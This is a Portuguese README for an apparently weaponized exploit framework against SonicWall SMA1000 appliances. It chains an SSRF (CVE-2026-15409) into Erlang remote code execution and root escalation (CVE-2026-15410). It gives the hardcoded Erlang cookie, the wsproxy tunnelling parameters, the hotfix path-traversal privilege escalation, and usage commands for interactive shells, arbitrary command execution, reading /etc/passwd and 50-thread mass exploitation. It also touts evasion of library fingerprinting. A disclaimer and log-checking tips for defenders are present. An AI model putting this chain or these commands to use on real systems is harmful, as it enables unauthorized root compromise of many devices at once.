
Framework multi-exploit para SonicWall SMA1000 encadeando SSRF (CVE-2026-15409) a Erlang RCE e escalonamento de privilégios root (CVE-2026-15410). Oferece shell interativo, varredura em lote, operações de arquivo e modo de detecção seguro para testes de penetração autorizados.

Framework de Exploração & Ferramenta de Detecção Segura
Apenas para testes de segurança autorizados.
Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados.
Os autores e colaboradores não são responsáveis por qualquer uso indevido ou danos causados por este software. Os usuários são os únicos responsáveis por garantir que possuem permissão explícita por escrito do proprietário do alvo antes de testar. O acesso não autorizado a sistemas de computador é ilegal sob o Computer Fraud and Abuse Act (CFAA) e leis similares em todo o mundo.
Ao usar este software, você concorda com:
⚠️ AVISO: Esta vulnerabilidade está sendo ativamente explorada na natureza. O uso não autorizado pode resultar em consequências legais severas.
CVE-2026-15409 é uma vulnerabilidade crítica de Server-Side Request Forgery (SSRF) sem autenticação descoberta na interface Work Place do SonicWall SMA1000 Appliance.
Como funciona:
wsproxy.os:cmd/1.Fatos importantes:
exploit.py)O exploit totalmente weaponizado encadeia CVE-2026-15409 e CVE-2026-15410 para obter comprometimento de nível root.
| Recurso | Descrição |
|---|---|
| 🚀 SSRF → RPC Erlang | Faz túnel automaticamente através do wsproxy para alcançar nós Erlang internos. |
| 💻 Execução Remota de Código | Executa comandos arbitrários do SO via os:cmd/1. |
| 🔐 Shell Interativo | Abre um shell ao vivo com suporte para comandos privesc e download. |
| 👑 Escala para Root | Aproveita CVE-2026-15410 para escalar para root usando path traversal do AMC. |
| 📁 Operações de Arquivos | Lê e escreve arquivos no sistema alvo. |
| 🌐 Varredura em Lote | Explora múltiplos alvos em massa com threading (flag -l). |
| 🎯 Detecção de SSRF | Flag opcional --detect para verificação segura de vulnerabilidade. |
| ⚙️ Personalizável | Sobrescreve URL do WebSocket, Origin, User-Agent, Cookie e mais. |
| 🧩 Sem Dependências Extras | Usa apenas a biblioteca padrão do Python (exceto requests opcional para detecção). |
| 🔌 Implementação WebSocket Pura | Nenhuma biblioteca WebSocket externa — handshake personalizado em nível de socket evita impressões digitais específicas de bibliotecas para melhor OPSEC. |
pip (para a biblioteca requests)pip install -r requirements.txt
# Shell interativo no alvo
python exploit.py -u 192.168.1.100
# Executar um único comando
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Ler um arquivo
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Habilitar detecção de SSRF antes da exploração
python exploit.py -u 192.168.1.100 --detect
# Tentar escala para root
python exploit.py -u 192.168.1.100 --privesc
# Exploração em massa a partir de arquivo (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Porta e caminho personalizados
python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
# Modo pipe (ler comando do stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Varredura de alvo único
python checker.py https://192.168.1.100
# Porta e caminho personalizados
python checker.py 192.168.1.100 --port 8443 --path /workplace
# Varredura em massa a partir de arquivo
python checker.py --list targets.txt
| Produto | Versões Vulneráveis | Versões Corrigidas |
|---|---|---|
| SMA 6210 | 12.4.3-03245, 12.4.3-03387, 12.4.3-03434 12.5.0-02283, 12.5.0-02624, 12.5.0-02800 | 12.4.3-03453+ 12.5.0-02835+ |
| SMA 7210 | Mesmo que acima | Mesmo que acima |
| SMA 8200v | Mesmo que acima | Mesmo que acima |
⚠️ Importante: Estas vulnerabilidades não afetam firewalls SonicWall (SSL-VPN) nem a série SMA 100.
O endpoint wsproxy na porta 443 aceita um parâmetro bmID iniciando com -3389 e uma especificação host:port. Apontando host=127.0.0.1 e port=1050, invasores podem fazer túnel para o serviço interno de distribuição Erlang.
O nó Erlang usa um cookie padrão hardcoded: 10ecad5b446e86864832904cd439b6b70262. Isso permite autenticação remota e execução de qualquer chamada os:cmd/1.
Uma vez autenticado, o exploit escreve um script shell em /var/tmp/ e aciona o endpoint XML-RPC remove_hotfix do AMC com um path traversal (../../../../var/tmp/script.sh), executando o script como root.
A SonicWall recomenda verificar:
extraweb_access.log por /__api__/login ou /__api__/logout (status 200)extraweb_access.log por /wsproxy com parâmetros de host suspeitos (status 101)ctrl-service.log por rollbacks de hotfix com path traversal/var/lib/unit/conf.json contendo rotas para /__api__/login ou /__api__/logout